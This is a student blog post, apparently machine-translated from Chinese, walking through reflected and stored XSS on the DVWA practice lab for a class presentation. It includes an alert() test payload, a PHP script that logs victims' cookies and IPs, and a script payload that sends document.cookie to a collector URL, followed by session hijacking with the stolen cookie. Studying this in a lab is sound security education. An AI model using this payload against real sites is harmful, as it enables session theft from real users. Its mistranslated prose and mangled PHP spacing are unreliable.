[Xss] practices on the dvwa platform, xssdvwa Platform

[Xss] practices on the dvwa platform, xssdvwa Platform

In the classroom, students are required to team up freely to prepare a security-related topic, so they will be eager to find the schoolmaster and want to hold his thigh. Recently, I decided to add part of the ppt to cover up the truth of soy sauce.Here is the nickname of xueba.It means that the technical point of a soy sauce is too soy sauce, and the technical points of the two soy sauce can be combined to combine them!
The previous article about soy sauce technology is
Login session hijacking
Another soy sauce technology is here.
I was also drunk. The theme I decided later was how to help my colleagues check my roommate space. What's even worse, this sort of tricky thing should be done for me! However, I don't know web security. I just want to watch the compilation in a quiet manner!
So after some sputation, I finally calmed down and entered the question below:

Environment

Server: Apache
Database: MySQL
URL: 192.168.1.104/dvwa
Visitor: 192.168.1.113

There are many tutorials on how to install dvwa on the Internet. I will not describe them here. You can search for them. Please note that the xampp port is occupied and the LAN is accessed.
Port occupation

1.80 port conflict. solution:
Open httpd in the directory C: \ xampp \ apache \ conf (my installation directory is C: \ xampp. in the conf file, replace 80 in Listen 80 and ServerName localhost: 80 with 8081 or another value (try not to use port 0-1023, which is the system reserved port.
2. listening port 443 conflict. solution:
Open the httpd-ssl.conf file under the directory C: \ xampp \ apache \ conf \ extra (my installation directory is C: \ xampp) and comment out Listen 443: # change Listen 443 to 443 or another value (do not use 0-4433 whenever possible ).

LAN Access

<LocationMatch "^/(?i:(?:xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info))">    Order deny,allow    #Deny from all    Allow from 127.0.0.0/8       # Require local    ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var</LocationMatch>

After the environment is configured, you can successfully access the local area network to start the attack.

Xss reflected attack vulnerability discovered

Xss occurs where everything is output by input. When you access a webpage, you will find such a window. When you enter venidic, the browser will directly return such data.

Right-click to view the source code. If no filtering is performed, the system returns the result directly.

<div class="vulnerable_code_area">        <form name="XSS" action="#" method="GET">            <p>What's your name?</p>            <input type="text" name="name">            <input type="submit" value="Submit">        </form>        <pre>Hello venidic </pre>    </div>

Then we can directly use</pre>Close the previous one<pre>Label, and then use<pre>Close</pre>You can enter the attack code in the middle.
Construct test code

</pre><script>alert('xss')</script><pre>

Test successful

Exploit vulnerabilities

Xss has always been used to pop up a box to confirm the existence of the vulnerability. However, there is nothing to do with it. The xss is tricky because it is at the front end, attackers can easily execute JavaScript scripts in the browser to steal cookies, hijack user sessions, or even develop xss worm. Because my web is too scum, I will only talk about the most basic way to steal cookies:

To record the cookie of a visitor, you need to write a script. If the victim triggers this js, the script will record the cookie of the victim.
Php script for cookie Interception

<? Php $ cookie = $ _ GET ['cookies']; // GET the cookie variable value in GET mode $ ip = getenv ('remote _ ADDR '); // Remote Host IP address $ time = date ('Y-m-d g: I: s'); // The value is "year-month-day: minute: second format display time $ referer = getenv ('HTTP _ referer'); // link source $ agent =$ _ SERVER ['HTTP _ USER_AGENT ']; // user browser type $ fp = fopen('cookie.txt ', 'A'); // open cookie.txt. If it does not exist, create fwrite ($ fp, "IP :". $ ip. "\ n Date and Time :". $ time. "\ n User Agent :". $ agent. "\ n Referer :". $ referer. "\ n Cookie :". $ coo Kie. "\ n"); // write the file fclose ($ fp); // close the file header ("Location: http://www.baidu.com") // redirect to baidu, prevent detection?>

The js attack code can be written as follows:

</pre><script>document.location = 'http://192.168.1.104/acceptcookie.php?cookie=' + document.cookie;</script><pre>

Click to submit
The webpage is redirected to baidu, proving that the attack was successful.

Open cookie.txt in the same directory

Hijacking successful

Open the Guilin veterans browser, modify the cookie, and then log on to the Homepage without a password.

Exploitation successful

Xss stored vulnerability discovered

Continue browsing and find a message book

Enter it as needed, and no filtering is found.

Attack code
Message:

<script>alert('xss')</script>

Submit

Triggering successful. log out of the website
At this time, as a website administrator, I log out of the server to go to the website management page.

Triggered successfully. As a visitor's message board, it is also triggered successfully.

Exploit vulnerabilities

Xss uses the same flexible and simplest method to steal cookies.

After

The task of holding your thigh is over now. I hope that the speech of xueba will be smooth! Do not let me give up the preview before the test week, stay up late to prepare this ghost and grow it!

//                            _ooOoo_  //                           o8888888o  //                           88" . "88  //                           (| -_- |)  //                            O\ = /O  //                        ____/`---'\____  //                      .   ' \\| |// `.  //                       / \\||| : |||// \  //                     / _||||| -:- |||||- \  //                       | | \\\ - /// | |  //                     | \_| ''\---/'' | |  //                      \ .-\__ `-` ___/-. /  //                   ___`. .' /--.--\ `. . __  //                ."" '< `.___\_<|>_/___.' >'"".  //               | | : `- \`.;`\ _ /`;.`/ - ` : | |  //                 \ \ `-. \_ __\ /__ _/ .-` / /  //         ======`-.____`-.___\_____/___.-`____.-'======  //                            `=---='  //  //         .............................................